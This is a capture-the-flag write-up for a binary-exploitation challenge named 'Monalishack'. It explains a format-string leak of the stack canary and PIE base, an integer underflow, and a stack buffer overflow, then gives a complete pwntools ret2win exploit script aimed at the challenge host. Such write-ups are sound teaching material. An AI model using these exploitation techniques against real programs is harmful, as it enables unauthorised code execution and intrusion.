Category : PWN

Phreaks 2600

You can find this writeup at Phreaks 2600 website

Vulnerabilities

This binary has three vulnerabilities :

• Format string vuln when we enter our name
• Integer underflow when we choose the number of rooms to visit
• Stack-based buffer overflow after entering rooms

Furthermore, this was a ret2win condition (thanks to readflag() function).

Leak addresses

Before the stack-based buffer overflow exploit, we have to leak canary and PIE base address. It was possible to do so using the format string vuln with these offsets :

• %3$p : canary
• %9$p : function address in PIE

This function address was at 0x16fb of PIE base address.

Ret2win

It was possible to trigger the stack-based buffer overflow by sending -1 to the number of rooms to visit. Then, the exploit goes this way :

• 10 bytes of offset between buffer and canary
• canary
• 8 bytes of RBP (unused)
• readflag() offset in binary + PIE base address

Exploit

 11
 2from pwn import *
 3import time
 4
 5host = "813c5bf7b00db4f393aa8480c7dafeda.chall.dvc.tf"
 6port = 443
 7
 8elf = ELF("./Monalishack")
 9p = remote(host, port, ssl=True)
10
11p.recvuntil(b"Enter your name :")
12p.sendline(b"%3$p-%9$p") # Format string vuln
13p.recvuntil(b"4. Quit")
14p.sendline(b"1")
15p.recv()
16leak = p.recv().split(b'\n')[1].split(b'-')
17
18canary, pie_leak = int(leak[0],16),int(leak[1],16)
19base_pie = pie_leak - 0x16fb
20p.sendline(b"3") # Third choice
21p.sendline(b"-1") # Number of rooms -> integer underflow -> triggers the stack BOF
22p.sendline(b'A'*10 + p64(canary) + cyclic(8) + p64(elf.sym["readflag"] + base_pie))
23p.interactive()